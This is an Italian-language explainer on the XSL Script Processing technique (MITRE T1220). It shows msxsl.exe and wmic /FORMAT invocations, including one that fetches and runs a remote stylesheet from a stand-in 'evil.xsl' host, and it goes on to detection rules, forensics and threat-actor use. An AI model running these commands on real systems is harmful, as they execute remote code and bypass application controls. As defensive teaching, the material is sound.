Script XSL Mascherati: XSL Script Processing (T1220)

La prima variante sfrutta msxsl.exe, l'utility Microsoft per le trasformazioni XSL. Questo binario non è installato di default su Windows, quindi dovrai prima includerlo nel tuo toolkit. Una volta disponibile, puoi eseguire JavaScript malevolo embedded in file XSL con sintassi apparentemente innocue.

Il comando base prevede due argomenti: un file XML sorgente e un foglio di stile XSL. La bellezza di questa tecnica sta nella sua flessibilità estrema:

msxsl.exe customers.xml script.xsl

Puoi addirittura usare lo stesso file XSL due volte, poiché XSL è XML valido. Questo riduce la complessità dell'attacco:

msxsl.exe script.xsl script.xsl

Una caratteristica particolarmente subdola permette di camuffare i file con estensioni arbitrarie. I controlli basati su estensione vengono completamente aggirati:

msxsl.exe script.jpeg script.jpeg

La seconda variante, conosciuta come "Squiblytwo", sfrutta Windows Management Instrumentation (WMI). Questa tecnica è ancora più potente perché utilizza strumenti nativi di Windows, eliminando la necessità di distribuire binari aggiuntivi.

Per esecuzione locale, il comando WMI con switch /FORMAT diventa:

wmic process list /FORMAT:evil.xsl

L'esecuzione remota è altrettanto semplice, permettendo di hostare il payload su server controllati:

wmic os get /FORMAT:"https://example.com/evil.xsl"

Nel tuo laboratorio, crea prima un file XSL con JavaScript embedded. La struttura base include namespace XML e un tag script che contiene il payload. Testa entrambe le varianti per comprendere i diversi indicatori che generano nel sistema target.

La detection di questa tecnica richiede un approccio multilivello che combini analisi dei processi, pattern di command-line e comportamento di caricamento moduli. La regola DET0205 fornisce una base solida per identificare l'abuso di script XSL.

Monitora attentamente la creazione di processi msxsl.exe e l'utilizzo di wmic.exe con switch /FORMAT. Questi eventi generano log distintivi in Sysmon con EventCode 1 per la creazione processo. La correlazione temporale tra il caricamento di DLL come jscript.dll o vbscript.dll e la creazione di processi sospetti è un indicatore forte.

I pattern di command-line da monitorare includono l'uso di estensioni non standard (.jpeg, .png) con msxsl.exe. Questa anomalia è raramente legittima e merita investigazione immediata. Per wmic, qualsiasi uso del parametro /FORMAT con file locali o URL remoti dovrebbe generare un alert.

La gestione dei falsi positivi richiede attenzione al contesto del parent process. Strumenti amministrativi legittimi o ambienti di sviluppo possono utilizzare msxsl per trasformazioni valide. Implementa una whitelist di domini conosciuti per trasformazioni XSL aziendali legittime.

Configura il tuning basandoti su:

• Pattern di encoding negli input command-line
• Catene di processi parent legittime nel tuo ambiente
• Finestre temporali tra caricamento script engine e spawn di processi
• Domini remoti utilizzati per trasformazioni legittime

La correlazione eventi deve considerare una finestra temporale di almeno 30 secondi tra il caricamento delle DLL di scripting e eventuali processi figli sospetti.

L'analisi forense di attacchi XSL richiede particolare attenzione agli artefatti di esecuzione script. I file XSL malevoli possono essere recuperati da diverse location nel filesystem, incluse directory temporanee e cache del browser se scaricati da remoto.

Esamina attentamente il Prefetch di Windows per tracce di msxsl.exe. Anche se non installato di default, la sua presenza indica possibile attività malevola. Il file .pf conterrà timestamp di esecuzione e riferimenti ai file XSL utilizzati.

Per gli attacchi Squiblytwo via WMI, analizza i log WMI-Activity/Operational. Gli eventi di esecuzione remota lasciano tracce distintive con URL completi dei payload XSL. La cache di Internet Explorer può contenere copie dei file XSL scaricati.

Cobalt Group ha dimostrato l'uso pratico di questa tecnica per bypassare AppLocker. Nei loro attacchi, i file XSL contenevano codice JScript offuscato che scaricava payload secondari. La timeline tipica mostra:

1. Distribuzione iniziale di msxsl.exe
2. Creazione o download del file XSL
3. Esecuzione via command-line
4. Caricamento di jscript.dll
5. Connessioni di rete per payload aggiuntivi

Durante Operation Dream Job, Lazarus Group utilizzava script XSL remoti per scaricare DLL custom encodate in Base64. L'analisi della memoria può rivelare i payload decodificati ancora residenti. Cerca pattern di allocazione memoria associati a msxsl.exe o wmic.exe che contengano codice eseguibile.

Le chiavi di registro per la persistence sono rare con questa tecnica, ma controlla sempre scheduled tasks e WMI subscriptions che potrebbero invocare comandi XSL periodicamente.

Cobalt Group (G0080) rappresenta il caso d'uso più sofisticato di questa tecnica. Il gruppo, noto per attacchi al settore finanziario, integra msxsl.exe nelle loro catene di infezione multi-stadio. L'uso di XSL per bypassare AppLocker indica una profonda conoscenza delle configurazioni di sicurezza enterprise Windows.

Higaisa (G0126) preferisce invece VBScript embedded in file XSL, suggerendo una possibile preferenza per linguaggi di scripting più tradizionali. Questa scelta potrebbe riflettere competenze del team o compatibilità con infrastructure legacy nei loro target tipici del sud-est asiatico.

Il malware Astaroth (S0373) dimostra l'evoluzione della tecnica verso hosting remoto. L'uso di domini esterni per ospitare stylesheet XSL permette aggiornamenti dinamici del payload senza modificare il dropper iniziale. Questo approccio modulare è caratteristico di operazioni a lungo termine.

Operation Dream Job (C0022), attribuita a Lazarus Group, mostra l'integrazione di XSL in campagne di spear-phishing sofisticate. Il periodo operativo 2019-2020 ha visto l'uso di false offerte di lavoro nel settore difesa e aerospaziale. L'uso di script XSL remoti per scaricare downloader custom suggerisce infrastructure C2 robuste.

I pattern geografici mostrano interesse particolare per:

• Settore finanziario (Cobalt Group)
• Difesa e aerospazio (Operation Dream Job)
• Target governativi in Stati Uniti, Israele, Australia, Russia e India

L'overlap di tool tra questi attori è minimo, suggerendo sviluppo indipendente della tecnica. Tuttavia, la convergenza verso hosting remoto di payload XSL indica una tendenza comune verso operazioni più flessibili e difficili da rilevare.

Tecnica documentata nel framework MITRE ATT&CK. Operation Dream Job analizzata nel periodo 2019-2020. Dettagli di detection basati su regola DET0205 con correlazione eventi Sysmon per Windows.